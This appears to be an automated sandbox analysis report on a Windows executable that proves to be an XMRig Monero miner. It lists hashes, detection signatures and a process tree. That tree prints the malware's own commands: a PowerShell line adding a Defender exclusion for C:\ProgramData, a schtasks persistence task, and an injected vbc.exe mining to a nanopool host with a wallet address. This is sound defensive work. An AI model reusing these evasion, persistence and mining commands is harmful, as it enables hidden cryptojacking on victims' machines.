Analysis
-
max time kernel
58s -
max time network
115s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
04-01-2023 23:28
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
windows7-x64
11 signatures
150 seconds
General
-
Target
file.exe
-
Size
882KB
-
MD5
1b946a8d9e0e30915f241061c5106a3f
-
SHA1
2cf0b19ef93c46a164b0bc93cbb9f3793cb6c8cf
-
SHA256
2371a3a7ac61d4daffa56c66420d0bc7ec99f1aa7dd4428f2be4cbb9dc25138f
-
SHA512
b83858ee0e21c590cd932bbc92cbbf5a88d3458010535f18cfbe2343b99c396f373e788554b2638cfe0b76bca46e6b3734fe44d6b98d546b4252390a31be398f
-
SSDEEP
24576:qe9E/+x1L3sNSaH3uhbTsjc/BIQ8iU7cG19:qD+sM4UfsXrc2
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/908-105-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-107-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-109-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-110-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-112-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-114-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-117-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-119-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-120-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/908-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-125-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-128-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1228 set thread context of 908 1228 file.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 108 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1304 powershell.exe 1228 file.exe 1228 file.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1228 file.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeLockMemoryPrivilege 908 vbc.exe Token: SeLockMemoryPrivilege 908 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 908 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1228 wrote to memory of 1304 1228 file.exe 28 PID 1228 wrote to memory of 1304 1228 file.exe 28 PID 1228 wrote to memory of 1304 1228 file.exe 28 PID 1228 wrote to memory of 944 1228 file.exe 30 PID 1228 wrote to memory of 944 1228 file.exe 30 PID 1228 wrote to memory of 944 1228 file.exe 30 PID 944 wrote to memory of 108 944 cmd.exe 32 PID 944 wrote to memory of 108 944 cmd.exe 32 PID 944 wrote to memory of 108 944 cmd.exe 32 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34 PID 1228 wrote to memory of 908 1228 file.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"3⤵
- Creates scheduled task(s)
PID:108
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:908
-